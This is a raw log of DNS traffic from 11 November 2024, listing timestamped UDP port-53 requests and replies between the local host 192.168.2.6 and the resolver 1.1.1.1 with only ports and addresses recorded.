Nov 11, 2024 18:13:24.611816883 CET	53	55558	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.612587929 CET	53	49546	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.612597942 CET	53	58279	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.617588043 CET	59792	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.617686987 CET	53	52587	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.618006945 CET	62943	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.618648052 CET	64242	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.618721008 CET	53	53152	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.619776964 CET	55577	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.621510983 CET	59635	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.622495890 CET	52767	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.622875929 CET	62110	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.623488903 CET	58752	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.624118090 CET	63396	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.624696016 CET	59843	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.627197981 CET	60733	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.628998041 CET	62002	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.629359961 CET	53	59792	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.629658937 CET	61125	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.630024910 CET	53	64242	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.630122900 CET	55910	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.630774021 CET	57790	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.631175995 CET	53	55965	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.631922960 CET	53	59635	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.632154942 CET	53	55478	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.632165909 CET	53	62110	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.632230043 CET	55245	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.632740021 CET	53	51214	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.632750988 CET	53	52767	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.633380890 CET	53	58752	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.634048939 CET	53	63396	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.634310961 CET	56149	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.634625912 CET	63719	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.634912014 CET	64443	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.635632038 CET	56337	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.635870934 CET	49540	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.636069059 CET	55593	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.636347055 CET	59198	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.636671066 CET	63422	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.637413979 CET	61131	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.637691021 CET	53583	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.637768984 CET	59610	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.638343096 CET	58812	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.638355970 CET	53	62002	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.639013052 CET	50225	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.639095068 CET	57472	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.639386892 CET	53	55910	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.639556885 CET	53	61125	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.639686108 CET	53	49427	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.639698029 CET	55878	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.639832973 CET	53	49815	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.639844894 CET	53	55570	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.640818119 CET	53	61018	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.640907049 CET	57482	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.642163038 CET	53	55245	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.643913984 CET	53	56149	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.644639015 CET	53	63719	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.644756079 CET	61760	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.646224022 CET	53	59198	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.646341085 CET	53	55593	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.646445036 CET	53	63422	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.646795988 CET	53	59610	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.647716045 CET	53	53583	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.648986101 CET	53	50225	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.650264025 CET	53	57472	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.650969028 CET	53	62943	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.650979996 CET	53	57482	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.651376963 CET	53	55577	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.655318975 CET	53	61131	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.655736923 CET	53	61760	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.656189919 CET	53	59843	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.656203032 CET	53	58812	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.658483028 CET	53	60733	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.662513971 CET	61003	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.663283110 CET	53	57790	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.665824890 CET	53	49540	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.665837049 CET	53	64443	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.666150093 CET	62152	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.669975042 CET	53	56337	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.671930075 CET	53	55878	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.695014000 CET	53	61003	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.696867943 CET	53	62152	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.777339935 CET	56390	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.780863047 CET	53923	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.784533024 CET	61105	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.787395000 CET	53	56390	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.792524099 CET	53	53923	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.795325041 CET	49751	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.795705080 CET	57366	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.802500963 CET	60536	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.802690029 CET	53	49751	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.802747011 CET	64833	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.805619001 CET	53	57366	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.813952923 CET	53	60536	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.816951990 CET	53	61105	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.835838079 CET	53	64833	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.857240915 CET	58968	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.897624016 CET	54025	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.905401945 CET	53	54025	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.938561916 CET	58602	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.942970991 CET	52961	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.947535992 CET	57464	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.952128887 CET	62567	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.953387022 CET	53	52961	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.969511986 CET	53	58602	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.973017931 CET	58753	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.973880053 CET	58320	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.975994110 CET	50986	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.976883888 CET	56690	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.978070974 CET	54397	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.978635073 CET	53	57464	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.983066082 CET	53	58753	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.983592033 CET	53	58320	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.984596014 CET	53	62567	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:25.008692026 CET	53	50986	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:25.009903908 CET	53	56690	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:25.010381937 CET	53	54397	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:25.072876930 CET	53	58968	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:25.102166891 CET	63228	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:25.108886957 CET	57443	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:25.109016895 CET	64878	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:25.111696959 CET	54825	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:25.111881018 CET	52509	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:25.112144947 CET	52298	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:25.112329960 CET	60812	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:25.112643957 CET	50795	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:25.118318081 CET	53	57443	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:25.122131109 CET	53	52509	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:25.122143030 CET	53	52298	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:25.122467041 CET	53	60812	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:25.122483969 CET	53	50795	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:25.122494936 CET	53	54825	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:25.133294106 CET	53	63228	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:25.140002012 CET	53	64878	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.850748062 CET	58457	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.852122068 CET	63227	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.856211901 CET	55142	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.861366034 CET	53	58457	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.862221956 CET	53	63227	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.863133907 CET	54802	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.865645885 CET	56027	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.866333008 CET	53	55142	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.867909908 CET	51076	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.870023012 CET	64855	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.873048067 CET	53	54802	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.875346899 CET	50789	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.877036095 CET	63637	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.877455950 CET	53	56027	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.878545046 CET	53	51076	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.879885912 CET	53	64855	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.884263992 CET	53389	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.888247967 CET	53	63637	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.903409004 CET	63460	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.903800964 CET	55194	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.905056000 CET	59615	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.905951023 CET	53	50789	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.914833069 CET	53	59615	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.917176962 CET	53	53389	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.934504986 CET	53	63460	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.936322927 CET	64605	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.936484098 CET	49362	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.936626911 CET	60608	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.936778069 CET	52115	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.936917067 CET	52978	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.937052965 CET	62478	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.937321901 CET	60927	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.937472105 CET	53	55194	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.937612057 CET	55059	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.937745094 CET	64760	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.937892914 CET	62826	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.938030005 CET	50062	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.938168049 CET	49723	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.945791960 CET	53	64605	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.946202040 CET	53	52115	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.946671963 CET	53	62478	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.946980953 CET	53	62826	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.947591066 CET	53	60608	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.948227882 CET	53	64760	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.953042030 CET	49909	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.955373049 CET	50313	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.955532074 CET	50182	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.955713034 CET	54793	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.955748081 CET	50805	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.962727070 CET	53	54793	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.965193033 CET	53	50313	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.965568066 CET	53	50182	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.968076944 CET	53	49362	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.968806028 CET	53	49723	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.968816996 CET	53	52978	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.968986034 CET	53	55059	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.971333027 CET	53	60927	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.973654985 CET	53	50062	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.976151943 CET	60185	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.977761030 CET	65093	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.977870941 CET	52063	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.978003025 CET	50343	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.978066921 CET	61138	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.978218079 CET	57294	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.978377104 CET	63811	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.978444099 CET	52941	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.978540897 CET	64234	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.978619099 CET	62658	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.978724957 CET	64739	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.978790045 CET	54946	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.978895903 CET	50253	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.978940964 CET	56847	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.979111910 CET	55835	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.979531050 CET	52960	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.979728937 CET	57712	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.979883909 CET	64036	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.980036974 CET	59298	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.980189085 CET	52580	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.980354071 CET	62617	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.980510950 CET	58323	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.980658054 CET	52888	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.980829000 CET	53332	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.980988026 CET	58126	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.981223106 CET	55516	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.981638908 CET	60374	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.984220982 CET	62023	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.984257936 CET	56173	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:28.984572887 CET	53	49909	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.986620903 CET	53	50805	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.987879038 CET	53	65093	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.987890959 CET	53	64234	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.988348961 CET	53	52941	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.988364935 CET	53	52063	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.988904953 CET	53	50253	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.988925934 CET	53	55835	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.989665985 CET	53	64739	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.989701986 CET	53	58323	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.989926100 CET	53	56847	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.990219116 CET	53	52960	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.990231037 CET	53	62617	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.991030931 CET	53	60374	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.991095066 CET	53	52888	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.991219997 CET	53	53332	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.991230011 CET	53	52580	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.991702080 CET	53	55516	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.993864059 CET	53	62023	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:28.993875980 CET	53	56173	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:29.000205994 CET	53	58126	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:29.001223087 CET	53	57712	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:29.007472038 CET	53	60185	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:29.008328915 CET	53	50343	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:29.010353088 CET	53	54946	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:29.010364056 CET	53	61138	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:29.010375977 CET	53	63811	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:29.010387897 CET	53	62658	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:29.010935068 CET	53	57294	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:29.010982037 CET	53	64036	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:29.011136055 CET	53	59298	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.137864113 CET	50679	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.145159960 CET	51604	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.161514997 CET	59184	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.180037975 CET	59530	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.193443060 CET	52882	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.206515074 CET	62710	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.208904982 CET	63607	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.209439039 CET	59989	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.252800941 CET	59818	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.263993979 CET	49444	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.264791012 CET	58869	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.340703964 CET	51987	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.348736048 CET	57985	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.349683046 CET	64397	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.368113995 CET	51581	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.370193958 CET	55335	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.378870010 CET	58385	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.380770922 CET	56108	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.402923107 CET	49717	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.409113884 CET	51178	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.419281960 CET	50998	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.482089043 CET	53	49444	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.483258009 CET	53	62710	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.483838081 CET	53	56108	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.483974934 CET	53	51987	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.483984947 CET	53	59818	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.484059095 CET	53	51178	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.484249115 CET	53	50998	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.485275984 CET	53	49717	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.485285997 CET	53	55335	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.485296011 CET	53	59184	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.485583067 CET	53	64397	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.486439943 CET	53	51604	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.488167048 CET	53	50679	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.505780935 CET	53	52882	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.506118059 CET	53	57985	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.506154060 CET	53	51581	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.506220102 CET	53	58385	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.555912971 CET	60089	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.556931019 CET	50751	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.557965994 CET	64422	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.560534000 CET	49605	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.566126108 CET	53	60089	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.567949057 CET	53	64422	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.569071054 CET	64085	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.585695982 CET	63384	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.587166071 CET	53	50751	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.590470076 CET	62113	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.591609955 CET	53	49605	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.597562075 CET	53	62113	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.605029106 CET	53	64085	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.611571074 CET	61078	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.612993956 CET	53	59530	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.617208958 CET	53	63384	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.617664099 CET	57571	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.621575117 CET	53	61078	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.621968031 CET	59848	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.631509066 CET	53	59848	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.648988962 CET	53	57571	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.662405968 CET	65531	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.666029930 CET	53	59989	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.667449951 CET	62441	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.679136038 CET	53	62441	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.692327976 CET	61245	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.693458080 CET	53	65531	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.705282927 CET	53	61245	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.711934090 CET	53	63607	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.797091961 CET	53447	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.829407930 CET	53	53447	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.919466972 CET	58137	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.926557064 CET	60983	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.930054903 CET	53	58137	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.935220003 CET	62561	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.935774088 CET	53	60983	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.938868999 CET	49682	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.945288897 CET	53	62561	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.953946114 CET	54519	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.956999063 CET	53	58869	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.961440086 CET	57543	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.962474108 CET	59233	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:35.966157913 CET	53	54519	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.971343994 CET	53	49682	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.973993063 CET	53	59233	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.979285955 CET	53	57543	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:35.989726067 CET	59328	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.002146006 CET	53	59328	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:36.025599957 CET	61919	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:36.033107996 CET	53	61919	1.1.1.1	192.168.2.6
